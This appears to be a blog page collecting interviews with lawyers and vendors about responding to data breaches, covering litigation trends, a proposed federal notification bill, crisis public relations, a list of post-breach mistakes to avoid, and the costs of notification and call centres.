Data Breach Events: A Plaintiff Perspective

A Q&A with John Yanchunis of Morgan & Morgan
The legal landscape around data loss is rapidly evolving, and with major events such as the Anthem breach changing the game on a daily basis, it can be a challenge to keep up with the courts’ current thinking. I spoke with plaintiff attorney John Yanchunis of Morgan & Morgan about some of the most recent developments he’s observed.


Digging Into the President’s Data Breach Notification Bill

A Q&A with Dominic Paluzzi of McDonald Hopkins
In late January 2015, the White House introduced the Personal Data Notification and Protection Act (PDNPA), a data breach notification bill, intended to improve national cybersecurity. I asked attorney and breach coach Dominic Paluzzi of McDonald Hopkins about how this bill differs from the existing laws and its potential implications for risk managers.


Data Breach Public Relations: Getting Ahead of the Message

A Q&A with Melanie Thomas of INFORM
It’s just one of many pressing concerns during a cyber security event, but public relations and crisis communications are absolutely essential for sustaining customer loyalty and brand reputation long after the headlines fade. I spoke with Melanie Thomas of INFORM about how these services work and what companies can do right now to prepare for an emergency situation.


14.5 Things NOT to Do Following a Data Breach Incident

A Q&A with John Mullen, Nelson Levine de Luca & Hamilton, LLP

The hours and days following the initial discovery of a breach are full of confusion and chaos. However, companies can save themselves from a lot of trouble later on down the line if they stay focused. We spoke to lawyer John F. Mullen Sr. of Nelson Levine de Luca & Hamilton, LLP in Blue Bell, PA, about dos and don’ts for companies in this situation—mostly don’ts.

The following is what he came up with:

  1. Don’t assume a breach won’t happen to you. It’s going to happen and you need to be insured. Even if you’re not a big multinational company that’s attracting hackers, you are likely to have someone working for you who could accidentally leave their laptop with TSA at the airport and land you in a data leak situation.
  2. Don’t kid yourself. This was a breach. I’ve seen companies in the aftermath of an incident who don’t want to come to terms with the reality so they bury it. They put off dealing with it. They rationalize. It doesn’t help.
  3. Don’t rush to judgment. Meaning, don’t start sending out notice until you know how many people are involved. To the extent possible, don’t start responding until you have all of the facts.
  4. Don’t assume that the first factual answers you get are accurate. In all my years in the business, I have never encountered a case where the original version of the story ends up being the absolute story. The truth is always more complicated. See above.
  5. Don’t let your self-insured retention cripple you from taking the right action. In other words, don’t be cheap. If you’ve got a million-dollar problem, don’t let your 50,000-dollar checkbook force you to cut corners. At the end of the day, it’s just going to delay the action and compromise the situation.
  6. Don’t hire your favorite M&A lawyer for a breach case. This may sound self-serving but it’s also true: This is a specialty area of the law and you want a person who is an expert in this area to represent you.
  7. Don’t do what I call “panic hiring.” Yes, you have limited time to take care of the response, but don’t just hire the first vendors you meet. That’s the equivalent of walking into a car dealership and handing them your checkbook and asking the salesman to write in the price. You may be panicked but if you don’t hire the right people, they will take advantage of that and you’ll pay out of the nose. This is another reason to have cyber insurance, as many of the insurers have negotiated favorable rates with needed vendors.
  8. Don’t over-notify people when notice is required.
  9. Don’t ignore your vendor due diligence. If you’re handing off your data to a company to do your processing and they lose the information then you will likely still be held liable. Make sure the company has the insurance and capital to handle that kind of loss so you don’t get stuck.
  10. Don’t forget to create a response plan ahead of time.
  10.b Don’t run a response by committee. If you’ve got five people in charge, then no one’s in charge. Have a senior manager who handles decision-making and money spending in charge. If not, people will sit around looking at each other and it will take much longer to complete everything that needs to be done.
  11. Don’t rush through any of the process. Yes, there’s a time element involved—typically 45 to 60 days. But I can’t tell you how many clients come to me and say they want to give notice tomorrow. I always have to slow them down because inevitably they will find out they were more exposed than they thought, and then everything they did would be wrong and they’d have to do it all over again.
  12. Don’t fight with regulators, and don’t let your lawyers fight with regulators. Picking fights doesn’t help anybody and if you get on their bad side, regulators will put you through years of hell. Show that you’re willing to bend over backward to work with them and things will usually go well.
  13. Don’t forget e-discovery. Not saving your data up front can get you into big trouble down the road.
  14. Don’t assume you can win the class action suit. Clients come to me assuming they will win because there aren’t “sufficient damages,” but the courts are swinging the other way now and that is no longer the case.

In conclusion…
In assisting insurance companies in dealing with their data breach insurance claim incidents—on average about one per week, and no two events look the same—I find it amazing how many times we come across clients who trigger not one but several of the issues on Mr. Mullen’s list. The good news is that many businesses are starting to follow (albeit slowly) a prudent breach response roadmap, demonstrating that they have learned either from their own past mistakes or from watching other organizations (their peers/competitors) deal with a publicly reported incident.

Crisis Data Breach Response: Notification

A Q&A with Larissa K. Crum, Executive Vice President at Immersion, Ltd.
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. The first focuses on notification, and I spoke with Larissa K. Crum, Executive Vice President at Immersion, Ltd., which provides printing, mailing, emailing, call center, and returned mail management services.

At what point during a data breach does Immersion get the call?
I like to say that attorneys get the call on Friday at four p.m. and I get the call at seven. The first call usually goes out to an attorney (what we call the Breach Coach® in the eRisk Hub®) and sometimes forensics, but we’re getting calls sooner than we used to because of tight response deadlines. Since it’s such a small community in the industry, I’ll often get the heads up from someone I know about a project coming our way—we may not start the process of working with the company for another week, but it helps us look down the line and prepare. Occasionally we get a call from an employee who’s done a Google search. Most frequently, though, we hear from attorneys, insurance carriers and clients we already work with.

What happens after the call?
For our clients, we’ve already built an instant response plan, so when we get the call it’s usually a matter of reminding everyone to follow the plan. With new clients, we build from scratch. But either way, we start with the address file and run a verification service to make sure the addresses are still valid. We look for people who’ve died so we can contact their next of kin according to regulations. Then we send out mail and sometimes email notifications. We set up the call center so it’s in place as soon as anything goes out, because the majority of calls come in the first five to eight days after the notification goes out, and those people are usually the most upset and need to talk to someone.

What problems or hurdles do you typically encounter?
There are several. First, we are typically up against a regulatory deadline that is very tight, specifically with state or Federal statutes that have a specified response deadline (e.g., 5 days, 30 days, 45 days). Some of these timelines seem long, but there are many parts of a data breach response effort that need to be coordinated and you could end up eating days on cleaning up an address file, determining the signature at the bottom of the notice, or approving numerous versions of a letter.

The second common hurdle is thinking through the call center response process. Setting up a call center to handle notices (written, electronic or substitute notices) goes beyond supplying appropriate FAQs. Thinking through the call escalation process is often a bigger issue for a client, particularly on large breaches where you could have hundreds of calls a day escalated within the first week. Having a system in place and proper management is often the difference between a strong and a weak data breach response effort. After all, if a call gets escalated back to the organization that had the breach and it is not handled properly, this is the last image that the affected individual has of your organization. I heard an industry colleague say it best: “think of the response to the response.”

The final problem most commonly overlooked is the return address that appears when the notice goes in the mail. Most organizations assume that it should be their address. However, if you think about the amount of return mail as a percentage of the total number of notices going out, you quickly realize that most organizations are not prepared to handle or manage the volume of notices that will come back. There is a direct correlation between the age of the addresses provided and the percentage of returned mail. The newer the addresses, the lower the percentage of returns. The older the addresses, the higher the percentage of returns.

What are the approximate costs for notification services?
The cost can be anywhere from $1 to $4 USD per record. The size of a company isn’t always reflective of the size of a breach—a company with five employees can hold over 1 million records. Because of the potential for data breach services to become very expensive very quickly, we recommend purchasing a cyber liability policy. Most carriers have pre-negotiated pricing with vendors that provide all of the elements in a data breach response effort, e.g. legal, forensics, notification, call center and credit monitoring. Having a cyber liability policy helps transfer the risk and cost of a data breach; however, organizations that proactively put together a data breach incident response plan can help mitigate the risk of a breach occurring.

In conclusion…
Thanks, Larissa, for sharing your experience and insights into the notification process. Note: Larissa’s cost estimates dovetail with our own findings in the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study.

